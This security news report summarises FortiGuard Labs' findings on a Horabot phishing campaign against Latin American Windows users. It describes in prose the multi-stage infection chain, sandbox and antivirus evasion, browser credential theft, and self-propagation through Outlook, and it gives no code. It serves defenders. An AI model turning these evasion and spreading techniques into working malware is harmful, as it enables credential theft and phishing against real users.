Cybercriminals Use Malicious HTML Files to Distribute Horabot Malware

Researchers at FortiGuard Labs uncovered a sophisticated phishing operation distributing the Horabot malware family, specifically targeting Spanish-speaking Microsoft Windows users in Latin America.

This campaign leverages carefully crafted phishing emails impersonating invoices or financial documents, which contain malicious HTML attachments engineered to evade detection and maximize infection rates.

Initial Infection Vector: HTML Phishing

Attackers initiated their campaign by sending phishing emails in Spanish, purporting to originate from legitimate businesses in Mexico.

The phishing emails contained ZIP file attachments, which housed weaponized HTML files.

When opened, these HTML files executed embedded, Base64-encoded scripts that redirected victims to remote URLs, launching a chain of payload downloads.

The process began with JavaScript code, which fetched a ZIP archive containing an HTML Application (HTA) file from a malicious server.

The HTA executed browser manipulation techniques and proceeded to download further scripts for deeper compromise.

Multi-Stage Payload Delivery and Evasion

The infection chain exploited a combination of VBScript, AutoIt scripts, and PowerShell commands to achieve system reconnaissance, credential theft, and the deployment of secondary malware payloads.

The use of VBScript was especially notable for its anti-analysis features: it checked for the presence of Avast antivirus, virtual environments, or known machine names, and would halt execution if such conditions were detected.

The script also prepared staging directories, harvested system and user information, and exfiltrated this data to command-and-control (C2) infrastructure.

To obfuscate actions and minimize detection, the campaign downloaded legitimate tools such as AutoIt3 and Aut2Exe, alongside malicious encrypted payloads and decoding routines.

These artifacts were disguised as system updates or hidden files and leveraged to decrypt additional malware modules.

According to Fortinet Report, timed markers further reduced the likelihood of reinfection and simplified attack coordination.

Once implanted, Horabot aggressively harvested browser credentials from major browsers like Chrome, Edge, Opera, and others.

It also collected Outlook contact lists and email addresses, filtering out personal and non-corporate domains to construct targeted attack lists.

The malware then abused Outlook’s COM automation to distribute new phishing emails from compromised accounts, allowing for lateral propagation throughout organizational and personal mail networks.

Exfiltrated data-including credentials, system details, and harvested contact lists-was sent via HTTP POST requests to managed C2 endpoints using structured parameters for efficient parsing and victim profiling.

The malware also implemented persistence mechanisms via crafted shortcuts and batch scripts placed within Windows startup locations, ensuring reinfection and continued operation following reboots.

Fortinet’s security solutions, including FortiGate, FortiMail, FortiClient, and FortiEDR, detect and block all observed Horabot malware variants as HTML/Phishing, AutoIt/Agent, and BAT/Agent threats.

Experts recommend organizations educate staff about phishing, monitor for unknown file activity, and block emails with suspicious attachments or abnormal behaviors.

Additionally, regular updates and the deployment of endpoint protections are critical in mitigating these evolving threats.

Indicators of Compromise (IOCs)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates